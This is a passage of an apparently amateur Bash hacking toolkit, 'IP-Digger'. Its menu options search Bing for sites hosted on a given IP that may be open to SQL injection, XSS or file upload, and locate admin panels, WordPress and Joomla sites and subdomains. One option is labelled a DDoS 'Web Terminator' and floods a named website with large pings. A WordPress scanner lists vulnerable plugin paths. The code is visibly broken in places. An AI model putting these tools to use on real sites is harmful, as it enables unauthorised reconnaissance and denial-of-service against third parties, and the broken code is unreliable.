- cat aspsql_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> sqli_websites.txt
- number=0
- for line in `cat sqli_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d sqli_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l aspsql_vulnerable_websites.txt | sed 's/aspsql_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N SQLI Websites ( ASP SERVER ) =)) \e[0m"
- rm -f many.txt;
- rm -f sqli_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in aspsql_vulnerable_websites.txt in the Desktop =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- read -p "Press Enter to Cont"
- if [ "$mychoice" = "8" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance ASP XSS Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;31m <^> --------- Advance ASP XSS Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the XSS Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding XSS Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SQLI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( XSS Vulnerable Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+search.asp?&qs=n&pq=ip:$ipaddress+search.asp?&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O xss_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
- cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> aspxss_vulnerable_websites.txt
- rm -f xss_website_finder.php
- let page=$page+1
- done
- cat aspxss_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
- number=0
- for line in `cat sqli_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d xss_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l aspxss_vulnerable_websites.txt | sed 's/aspxss_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N ASP XSS Websites =)) \e[0m"
- rm -f many.txt;
- rm -f xss_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in aspxss_vulnerable_websites.txt in the Desktop =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- read -p "Press Enter to Cont"
- #<!--- SQLI Website Finder ---!>
- if [ "$mychoice" = "9" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance ASP Admin Panel Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;31m <^> --------- Advance ASP Admin Panel Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the Admin Panels on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding Admin Panels B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- RFI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Admin PAnel Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+admin+login&qs=n&pq=ip:$ipaddress+admin+login&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O ap_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' ap_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' ap_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' ap_website_finder.php`
- cat "ap_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" ap_website_finder.php | cut -d '"' -f 2 >> asp_ap_vulnerable_websites.txt
- rm -f ap_website_finder.php
- let page=$page+1
- done
- cat asp_ap_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> ap_websites.txt
- number=0
- for line in `cat ap_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d ap_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l asp_ap_vulnerable_websites.txt | sed 's/asp_ap_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N Admin Panels =)) \e[0m"
- rm -f many.txt;
- rm -f ap_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in asp_ap_vulnerable_websites.txt in the Desktop =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- read -p "Press Enter to Cont"
- #<!--- ASP ADMIN PANEL FINDER ---!>
- #<!---- Upload Vulnerability ----!>
- if [ "$mychoice" = "10" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Advance ASP Upload Vulnerability Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;31m <^> --------- Advance ASP Upload Vulnerability Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the File Uploading Vulnerable Websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding File Uploading Vulnerable Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- UP Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( File Uploading )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+upload&qs=n&pq=ip:$ipaddress+upload&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O up_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' up_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' up_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' up_website_finder.php`
- cat "up_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" up_website_finder.php | cut -d '"' -f 2 >> asp_up_vulnerable_websites.txt
- rm -f up_website_finder.php
- let page=$page+1
- done
- cat aspup_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> up_websites.txt
- number=0
- for line in `cat up_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d up_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l aspup_vulnerable_websites.txt | sed 's/aspup_vulnerable_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N File Upload Vulnerable Websites =)) \e[0m"
- rm -f many.txt;
- rm -f up_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in aspup_vulnerable_websites.txt in the Desktop =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- read -p "Press Enter to Cont"
- #<!--- ASP XSS FINDER ---!>
- #sort Wordpress sites finder
- if [ "$mychoice" = "11" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Wordpress Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;31m <^> --------- Wordpress Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the Wordpress websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding Wordpress Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SQLI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Wordpress Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+wordpress&qs=n&pq=ip:$ipaddress+wordpress&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O xss_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
- cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> wordpress_websites.txt
- rm -f xss_website_finder.php
- let page=$page+1
- done
- cat wordpress_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
- number=0
- for line in `cat sqli_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d xss_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l wordpress_websites.txt | sed 's/wordpress_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N Wordpress Websites =)) \e[0m"
- rm -f many.txt;
- rm -f xss_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in wordpress_websites.txt in the Desktop =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- read -p "Press Enter to Cont"
- #Joomla Site finder
- if [ "$mychoice" = "12" ]; then
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Joomla Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo " <^> ---------------------------------- <^> "
- echo -e " \e[1;31m <^> --------- Joomla Site Finder ( IP Address ) ---------- <^> \e[0m "
- echo
- echo -e " \e[1;35m This Tool will scan for the Joomla websites on the IP Address that You will Provide it =)) \e[0m "
- echo
- read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
- echo -e " \e[1;36m<^> Finding Joomla Websites B| <^> \e[0m"
- #<!--- Blank Input -----------------!>
- if [ -z $ipaddress ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SQLI Website Finder ---!>
- F_ARG=$ipaddress
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function usage()
- echo ""
- echo "<^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Wordpress Website Finder )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo "<^> ---------------------------------- <^> "
- # check for inputs
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
- exit 1
- echo -e "\e[1;32m <^> Searching on Bing =))\e[0m\n "
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- url="http://www.bing.com/search?q=ip:$ipaddress+joomla&qs=n&pq=ip:$ipaddress+joomla&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- wget -q -O xss_website_finder.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
- #no results
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
- #single page result
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
- cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> joomla_websites.txt
- rm -f xss_website_finder.php
- let page=$page+1
- done
- cat joomla_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
- number=0
- for line in `cat sqli_websites.txt`
- varfor=`echo "$line" | egrep "$ipaddress"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d xss_websites.txt
- let count=$count+1
- done
- #sort SQL websites
- found_N=`wc -l joomla_websites.txt | sed 's/joomla_websites.txt//'`
- echo
- echo -e "\e[1;37mFound $found_N Joomla Websites =)) \e[0m"
- rm -f many.txt;
- rm -f xss_websites.txt
- echo
- echo -e "\e[1;34m <^> Searched websites have been saved in joomla_websites.txt in the Desktop =))
- \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
- echo
- echo "<^> --------------------------------------------------- <^> "
- echo
- read -p "Press Enter to Cont"
- # Web Terminator
- if [ "$mychoice" = "14" ]; then
- echo -e " \e[1;31m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Web Terminator aka DDos Attack! )"
- echo " Coded by :- Un_N0n "
- echo " <^> ---------------------------------- <^> "
- echo -e "\e[1;34m Want to take the Website down =)) Then it is the best t0ol for ew xD \e[0m "
- echo
- read -p "[+] Enter the website you want to DDos :- " domain
- # No input
- if [ -z $domain ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- echo
- echo -e "\e[1;31m DDosing on $website started "
- echo -e "\e[1;34m For stopping the DDosing press CTRL + C "
- res=`ping $domain -s 5000`
- res2=`ping $domain -s 5000`
- res3=`ping $domain -s 5000`
- res4=`ping $domain -s 5000`
- res5=`ping $domain -s 5000`
- res6=`ping $domain -s 5000`
- res7=`ping $domain -s 5000`
- res8=`ping $domain -s 5000`
- res9=`ping $domain -s 5000`
- res10=`ping $domain -s 5000`
- # IP resolver
- if [ "$mychoice" = "15" ]; then
- echo -e " \e[1;32m ---------------------------------- "
- echo -e " Tool Name :- IP Resolver"
- echo -e " Coded by :- Un_N0n "
- echo -e " ---------------------------------- \e[0m "
- echo
- read -p "[+] Enter the website :- " domain
- # No input
- if [ -z $domain ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- ping=`ping $domain -c 1 | awk '{print $5}' | grep -v 'bytes'`
- echo
- echo -e "\e[1;31m The IP of $domain is :- " $ping
- echo
- read -p "Press Enter to Cont"
- #==================================================================================================
- if [ "$mychoice" = "13" ]; then
- echo -e " \e[1;31m !--------- Sub Domain Scanner -> Un_N0n , Coded by - Beni_Vanda ( IrIsT ) ---------!\e[0m"
- echo
- read -p "Enter The Website *(www.website_name.com)* : " domain
- echo
- echo -e "\e[1;32m[*] Weapons Ready.\e[0m"
- # No input
- if [ -z $domain ]; then
- echo "-_- ----------------------------- -_- "
- echo -e "\e[1;31m Blank Input \e[0m"
- echo "-_- ----------------------------- -_- "
- exit
- #<!--- SUB DOMAIN SCANNER ---!>
- #==================================================================================================
- F_ARG=$domain
- page=0
- last_page_check=
- how_many=1
- single_page=
- domain=
- function Usage()
- echo ""
- echo "# ******************************************************************************************#"
- echo "# Name : SubDomain-Scanner.sh [Domain] *#"
- echo "# Help : -h && --help : Show This Menu *#"
- echo "# by : Beni_Vanda ( IrIsT ) #"
- echo "# ******************************************************************************************#"
- echo ""
- # check for arguments
- if [ -z "$F_ARG" ] || [ "$F_ARG" == "-h" ] || [ "$F_ARG" == "--help" ]; then
- Usage;
- exit 1
- if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
- then
- echo -e "\e[1;31mplease insert doamin with out http:// \e[0m"
- exit 1
- if [ `echo "$F_ARG" | egrep "www."` ];
- then
- domain=`echo "$F_ARG" |sed '/www./s///g' `
- echo -e "\e[1;31m[*] Going To Use Bing Servers ...\e[0m"
- while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
- #http://www.bing.com/search?q=%27yahoo.com%27&qs=n&pq=%27yahoo.com%27&sc=0-0&sp=-1&sk=&first=80&FORM=PERE"
- url="http://www.bing.com/search?q=%27$domain%27&qs=n&pq=%27$domain%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
- # url="http://www.bing.com/search?q=ip%3A$IP&go=&qs=n&first=${page}0&FORM=PERE"
- # out=`mktemp -p /tmp -t IrIsT_Sub_Domain_Bing.tmp.XXXXXX`
- wget -q -O sub_domain_bing.php "$url"
- last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sub_domain_bing.php`
- # if no results are found, how_many is empty and the loop will exit
- how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sub_domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
- # check for a single page of results
- single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sub_domain_bing.php `
- cat "sub_domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" sub_domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
- rm -f sub_domain_bing.php
- let page=$page+1
- done
- cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq >> subdomain.txt
- number=0
- for line in `cat subdomain.txt`
- varfor=`echo "$line" | egrep "$domain"`
- let number=$number+1
- if [ -z $varfor ]
- then
- echo "$number" >> many.txt
- fi
- done
- count=0
- for txtvar in `cat many.txt`
- let del=$txtvar-$count
- hey=$del
- sed -i "$hey"d subdomain.txt
- let count=$count+1
- done
- #sort subdomain | uniq
- found_N=`wc -l subdomain.txt | sed 's/subdomain.txt//'`
- echo
- echo -e "\e[1;34mFound $found_N SubDomains :) \e[0m"
- rm -f alldomain_bing.txt;
- rm -f many.txt;
- mv subdomain.txt -t /root/Desktop
- echo
- echo -e "\e[1;32m[+] Results has been stored in file named subdomain.txt on Desktop, change its name to prevent overwrite. [+]\e[0m"
- echo
- echo "##############################################################"
- echo
- read -p "Press Enter to Cont"
- }
- #==================================================================================================
- #<!--- SUB DOMAIN SCANNER ENDS ---!>
- if [ "$mychoice" = "88" ]; then
- {
- echo "-------------------------------------------------------------------------------------------------------------------------------"
- echo " | "
- echo " |Gurender Singh A.K.A Un_N0n "
- echo " |=-=-=-=-=-- :- "
- echo " | "
- echo -e " |\e[1;31m[1] - Admin of Team indihex , ICP.\e[0m "
- echo -e " |\e[1;31m[2] - For Contact Search On Facebook - Un_N0n.\e[0m"
- echo -e " |\e[1;31m[3] - ---------------------------------------------------------.\e[0m "
- echo -e " |\e[1;31m[4] - Bug Remover , Tester for IP-Digger. \e[0m "
- echo -e " |\e[1;31m[3] - Enjoy !.\e[0m"
- echo " | "
- echo " |[+] Peace Out. "
- echo "--------------------------------------------------------------------------------------------------------------------------------"
- echo
- echo
- read -p "Press Enter to Continue :-)"
- }
- #ABout IP-Digger
- if [ "$mychoice" = "99" ]; then
- {
- echo "-------------------------------------------------------------------------------------------------------------------------------"
- echo " | "
- echo " |IP-Digger v 4.0 - "
- echo " |=-=-=-=-=-- :- "
- echo " | "
- echo -e " |\e[1;31m This tool has been coded by Gurender Singh and Manoj Nath. \e[0m "
- echo -e " |\e[1;31m This tool is for the Web pentestors or Security experts for pentesting the websites\e[0m"
- echo -e " |\e[1;31m This tool is the best tool for the website attackers or the Web Security Expert "
- echo -e "\e[1;31m This version has serveral new features added to the IP-DiggEr \e[0m "
- echo " | "
- echo "------------------------------------------------------"
- echo
- read -p "Press Enter to Continue"
- }
- #Wordpress vulnerability scanner
- if [ "$mychoice" = "20" ]; then
- #Basic operators
- TIME="0" # sleep time among each request
- CURL="/usr/bin/curl"
- GREP="/bin/grep"
- CUT="/usr/bin/cut"
- LOGFILE="IP-Digger_Wordpress_scan$(date +%d-%b-%Y_%H%M)"
- #colors attribute
- RED="\e[1;31m"
- YELLOW="\e[1;33m"
- GREEN="\e[1;32m"
- BLUE="\e[1;34m"
- NO="\e[0m"
- STRXPL="$GREEN[+] EXPLOIT:$RED"
- #FIREFOX BROWSER BANNER
- BANNER="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
- #Error report
- get_error() {
- echo -e "\n\tBlank Input\n"
- exit 1
- #Main variables
- VICTIM=$web
- echo -e " \e[1;32m <^> ---------------------------------- <^> "
- echo " Tool Name :- IP DiggEr ( Wordpress Vulnerability Scanner )"
- echo " Coded by :- Manoj Nath ( Silent Hacker ) "
- echo -e " <^> ---------------------------------- <^> \e[0m"
- echo
- echo -e "\e[1;32m This tool helps you to scan the Wordpress site and scans for the vulnerability \e[0m"
- echo
- read -p "[+] Enter Wordpress website ( For Example :- http://www.target.com/ ) :- " web
- #Error
- if [ -z "$web" ]; then
- get_error
- #Wordpress Vulnerable Plugins
- vulns[0]="wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php"
- vulns[1]="wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php"
- vulns[2]="wp-admin/edit-tags.php"
- vulns[3]="wp-admin/link-manager.php"
- vulns[4]="wp-content/plugins/wptouch/wptouch.php"
- vulns[5]="wp-content/plugins/is-human/engine.php"
- vulns[6]="wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html"
- vulns[7]="wp-content/plugins/sermon-browser/sermon.php"
- vulns[8]="wp-content/plugins/backwpup/wp_xml_export.php"
- vulns[9]="wp-content/plugins/flash-album-gallery/lib/hitcounter.php"
- vulns[10]="wp-content/plugins/wp-custom-pages/wp-download.php"
- vulns[11]="wp-content/plugins/old-post-spinner/logview.php"
- vulns[12]="wp-content/plugins/jquery-mega-menu/skin.php"
- vulns[13]="wp-content/plugins/iwant-one-ihave-one/updateAJAX.php"
- vulns[14]="wp-content/plugins/forum-server/feed.php"
- vulns[15]="wp-content/plugins/relevanssi/relevanssi.php"
- vulns[16]="wp-content/plugins/gigpress/gigpress.php"
- vulns[17]="wp-content/plugins/comment-rating/comment-rating-options.php"
- vulns[18]="wp-content/plugins/zvote/zvote.php"
- vulns[19]="wp-content/plugins/user-photo/user-photo.php"
- vulns[20]="wp-content/plugins/enable-media-replace/upload.php"
- vulns[21]="wp-content/plugins/mingle-forum/feed.php"
- vulns[22]="wp-admin/post.php"
- vulns[23]="wp-content/plugins/accept-signups/accept-signups_submit.php"
- vulns[24]="wp-includes/comment.php"
- vulns[25]="wp-content/plugins/event-registration/event_regis.php"
- vulns[26]="wp-content/plugins/events-manager-extended/events-manager.php"
- vulns[27]="wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php"
- vulns[28]="wp-content/plugins/firestats/php/tools/get_config.php"
- vulns[29]="myLDlinker.php"
- vulns[30]="wp-content/plugins/simple-forum/sf-header-forum.php"
- vulns[31]="wp-content/plugins/cimy-counter/cimy_counter.php"
- vulns[32]="wp-content/plugins/nextgen-gallery/nggallery.php"
- vulns[33]="wp-content/plugins/cpl/cplphoto.php"
- vulns[34]="wp-content/plugins/events-calendar/events-calendar.php"
- vulns[35]="wp-content/plugins/pyrmont-v2/index.php"
- vulns[36]="wp-content/plugins/ImageManager/manager.php"
- vulns[37]="wp-content/plugins/wp-cumulus/wp-cumulus.php"
- vulns[38]="wp-includes/wpmu-functions.php"
- vulns[39]="wp-content/plugins/wp-syntax/test/index.php"
- vulns[40]="wp-content/plugins/my-category-order/mycategoryorder.php"
- vulns[41]="wp-content/plugins/related-sites/BTE_RW_webajax.php"
- vulns[42]="wp-content/plugins/dm-albums/dm-albums.php"
- vulns[43]="wp-content/plugins/dm-albums/template/album.php"
- vulns[44]="wp-content/plugins/photoracer/viewimg.php"
- vulns[45]="wp-content/plugins/wp-lytebox/main.php"
- vulns[46]="wp-content/plugins/fmoblog.php"
- vulns[47]="wp-content/plugins/wp-forum/forum_feed.php"
